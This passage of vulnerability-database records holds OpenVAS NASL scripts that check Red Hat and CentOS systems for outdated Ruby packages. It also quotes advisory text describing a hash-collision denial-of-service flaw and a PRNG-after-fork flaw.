value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"RHSA\", value: \"2011:1581-03\");\n script_name(\"RedHat Update for ruby RHSA-2011:1581-03\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of ruby\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.7.352~3.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-debuginfo\", rpm:\"ruby-debuginfo~1.8.7.352~3.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~1.8.7.352~3.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.7.352~3.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:38:45", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-02-01T00:00:00", "type": "openvas", "title": "RedHat Update for ruby RHSA-2012:0070-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2705", "CVE-2011-2686", "CVE-2011-4815", "CVE-2011-3009"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310870534", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870534", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for ruby RHSA-2012:0070-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-January/msg00026.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870534\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-01 11:35:50 +0530 (Wed, 01 Feb 2012)\");\n script_cve_id(\"CVE-2011-3009\", \"CVE-2011-4815\", \"CVE-2011-2686\", \"CVE-2011-2705\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"RHSA\", value:\"2012:0070-01\");\n script_name(\"RedHat Update for ruby RHSA-2012:0070-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ruby'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(5|4)\");\n script_tag(name:\"affected\", value:\"ruby on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Ruby is an extensible, interpreted, object-oriented, scripting language. It\n has features to process text files and to do system management tasks.\n\n A denial of service flaw was found in the implementation of associative\n arrays (hashes) in Ruby. An attacker able to supply a large number of\n inputs to a Ruby application (such as HTTP POST request parameters sent to\n a web application) that are used as keys when inserting data into an array\n could trigger multiple hash function collisions, making array operations\n take an excessive amount of CPU time. To mitigate this issue, randomization\n has been added to the hash function to reduce the chance of an attacker\n successfully causing intentional collisions. (CVE-2011-4815)\n\n It was found that Ruby did not reinitialize the PRNG (pseudorandom number\n generator) after forking a child process. This could eventually lead to the\n PRNG returning the same result twice. An attacker keeping track of the\n values returned by one child process could use this flaw to predict the\n values the PRNG would return in other child processes (as long as the\n parent process persisted). (CVE-2011-3009)\n\n Red Hat would like to thank oCERT for reporting CVE-2011-4815. oCERT\n acknowledges Julian Waelde and Alexander Klink as the original reporters of\n CVE-2011-4815.\n\n All users of ruby are advised to upgrade to these updated packages, which\n contain backported patches to resolve these issues.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.5~22.el5_7.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-debuginfo\", rpm:\"ruby-debuginfo~1.8.5~22.el5_7.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.5~22.el5_7.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.8.5~22.el5_7.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~1.8.5~22.el5_7.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.5~22.el5_7.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.8.5~22.el5_7.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-rdoc\", rpm:\"ruby-rdoc~1.8.5~22.el5_7.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-ri\", rpm:\"ruby-ri~1.8.5~22.el5_7.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.8.5~22.el5_7.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.8.1~18.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.1~18.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-debuginfo\", rpm:\"ruby-debuginfo~1.8.1~18.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.1~18.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.8.1~18.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.1~18.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.8.1~18.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.8.1~18.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2018-01-02T10:56:48", "description": "Check for the Version of irb", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for irb CESA-2012:0070 centos4 ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2705", "CVE-2011-2686", "CVE-2011-4815", "CVE-2011-3009"], "modified": "2017-12-29T00:00:00", "id": "OPENVAS:881191", "href": "http://plugins.openvas.org/nasl.php?oid=881191", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for irb CESA-2012:0070 centos4 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an extensible, interpreted, object-oriented, scripting language. It\n has features to process text files and to do system management tasks.\n\n A denial of service flaw was found in the implementation of associative\n arrays (hashes) in Ruby. An attacker able to supply a large number of\n inputs to a Ruby application (such as HTTP POST request parameters sent to\n a web application) that are used as keys when inserting data into an array\n could trigger multiple hash function collisions, making array operations\n take an excessive amount of CPU time. To mitigate this issue, randomization\n has been added to the hash function to reduce the chance of an attacker\n successfully causing intentional collisions. (CVE-2011-4815)\n \n It was found that Ruby did not reinitialize the PRNG (pseudorandom number\n generator) after forking a child process. This could eventually lead to the\n PRNG returning the same result twice. An attacker keeping track of the\n values returned by one child process could use this flaw to predict the\n values the PRNG would return in other child processes (as long as the\n parent process persisted). (CVE-2011-3009)\n \n Red Hat would like to thank oCERT for reporting CVE-2011-4815. oCERT\n acknowledges Julian W\u00e4lde and Alexander Klink as the original reporters of\n CVE-2011-4815.\n \n All users of ruby are advised to upgrade to these updated packages, which\n contain backported patches to resolve these issues.\";\n\ntag_affected = \"irb on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-January/018401.html\");\n script_id(881191);\n script_version(\"$Revision: 8257 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-29 07:29:46 +0100 (Fri, 29 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:39:50 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-3009\", \"CVE-2011-4815\", \"CVE-2011-2686\", \"CVE-2011-2705\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2012:0070\");\n script_name(\"CentOS Update for irb CESA-2012:0070 centos4 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of irb\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.8.1~18.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.1~18.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.1~18.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.8.1~18.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.1~18.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.8.1~18.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.8.1~18.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:09", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for ruby CESA-2012:0070 centos5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2705", "CVE-2011-2686", "CVE-2011-4815", "CVE-2011-3009"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881137", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881137", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for ruby CESA-2012:0070 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2012-January/018394.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881137\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:20:31 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-3009\", \"CVE-2011-4815\", \"CVE-2011-2686\", \"CVE-2011-2705\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"CESA\", value:\"2012:0070\");\n script_name(\"CentOS Update for ruby CESA-2012:0070 centos5\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ruby'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"ruby on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"Ruby is an extensible, interpreted, object-oriented, scripting language. It\n has features to process text files and to do system management tasks.\n\n A denial of service flaw was found in the implementation of associative\n arrays (hashes) in Ruby. An attacker able to supply a large number of\n inputs to a Ruby application (such as HTTP POST request parameters sent to\n a web application) that are used as keys when inserting data into an array\n could trigger multiple hash function collisions, making array operations\n take an excessive amount of CPU time. To mitigate this issue, randomization\n has been added to the hash function to reduce the chance of an attacker\n successfully causing intentional collisions. (CVE-2011-4815)\n\n It was found that Ruby did not reinitialize the PRNG (pseudorandom number\n generator) after forking a child process. This could eventually lead to the\n PRNG returning the same result twice. An attacker keeping track of the\n values returned by one child process could use this flaw to predict the\n values the PRNG would return in other child processes (as long as the\n parent process persisted). (CVE-2011-3009)\n\n Red Hat would like to thank oCERT for reporting CVE-2011-4815. oCERT\n acknowledges Julian W\u00e4lde and Alexander Klink as the original reporters of\n CVE-2011-4815.\n\n All users of ruby are advised to upgrade to these updated packages, which\n contain backported patches to resolve these issues.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.5~22.el5_7.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.5~22.el5_7.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.8.5~22.el5_7.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~1.8.5~22.el5_7.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.5~22.el5_7.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.8.5~22.el5_7.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-rdoc\", rpm:\"ruby-rdoc~1.8.5~22.el5_7.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-ri\", rpm:\"ruby-ri~1.8.5~22.el5_7.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.8.5~22.el5_7.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2018-01-02T10:56:48", "description": "Check for the Version of ruby", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for ruby CESA-2012:0070 centos5 ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2705", "CVE-2011-2686", "CVE-2011-4815", "CVE-2011-3009"], "modified": "2017-12-29T00:00:00", "id": "OPENVAS:881137", "href": "http://plugins.openvas.org/nasl.php?oid=881137", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for ruby CESA-2012:0070 centos5 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an extensible, interpreted, object-oriented, scripting language. It\n has features to process text files and to do system management tasks.\n\n A denial of service flaw was found in the implementation of associative\n arrays (hashes) in Ruby. An attacker able to supply a large number of\n inputs to a Ruby application (such as HTTP POST request parameters sent to\n a web application) that are used as keys when inserting data into an array\n could trigger multiple hash function collisions, making array operations\n take an excessive amount of CPU time. To mitigate this issue, randomization\n has been added to the hash function to reduce the chance of an attacker\n successfully causing intentional collisions. (CVE-2011-4815)\n \n It was found that Ruby did not reinitialize the PRNG (pseudorandom number\n generator) after forking a child process. This could eventually lead to the\n PRNG returning the same result twice. An attacker keeping track of the\n values returned by one child process could use this flaw to predict the\n values the PRNG would return in other child processes (as long as the\n parent process persisted). (CVE-2011-3009)\n \n Red Hat would like to thank oCERT for reporting CVE-2011-4815. oCERT\n acknowledges Julian W\u00e4lde and Alexander Klink as the original reporters of\n CVE-2011-4815.\n \n All users of ruby are advised to upgrade to these updated packages, which\n contain backported patches to resolve these issues.\";\n\ntag_affected = \"ruby on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-January/018394.html\");\n script_id(881137);\n script_version(\"$Revision: 8257 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-29 07:29:46 +0100 (Fri, 29 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:20:31 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-3009\", \"CVE-2011-4815\", \"CVE-2011-2686\", \"CVE-2011-2705\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2012:0070\");\n script_name(\"CentOS Update for ruby CESA-2012:0070 centos5 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of ruby\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.5~22.el5_7.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.5~22.el5_7.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.8.5~22.el5_7.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~1.8.5~22.el5_7.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.5~22.el5_7.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.8.5~22.el5_7.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-rdoc\", rpm:\"ruby-rdoc~1.8.5~22.el5_7.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-ri\", rpm:\"ruby-ri~1.8.5~22.el5_7.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.8.5~22.el5_7.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-01-08T12:57:55", "description": "Check for the Version of ruby", "cvss3": {}, "published": "2012-02-01T00:00:00", "type": "openvas", "title": "RedHat Update for ruby RHSA-2012:0070-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2705", "CVE-2011-2686", "CVE-2011-4815", "CVE-2011-3009"], "modified": "2018-01-08T00:00:00", "id": "OPENVAS:870534", "href": "http://plugins.openvas.org/nasl.php?oid=870534", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for ruby RHSA-2012:0070-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an extensible, interpreted, object-oriented, scripting language. It\n has features to process text files and to do system management tasks.\n\n A denial of service flaw was found in the implementation of associative\n arrays (hashes) in Ruby. An attacker able to supply a large number of\n inputs to a Ruby application (such as HTTP POST request parameters sent to\n a web application) that are used as keys when inserting data into an array\n could trigger multiple hash function collisions, making array operations\n take an excessive amount of CPU time. To mitigate this issue, randomization\n has been added to the hash function to reduce the chance of an attacker\n successfully causing intentional collisions. (CVE-2011-4815)\n \n It was found that Ruby did not reinitialize the PRNG (pseudorandom number\n generator) after forking a child process. This could eventually lead to the\n PRNG returning the same result twice. An attacker keeping track of the\n values returned by one child process could use this flaw to predict the\n values the PRNG would return in other child processes (as long as the\n parent process persisted). (CVE-2011-3009)\n \n Red Hat would like to thank oCERT for reporting CVE-2011-4815. oCERT\n 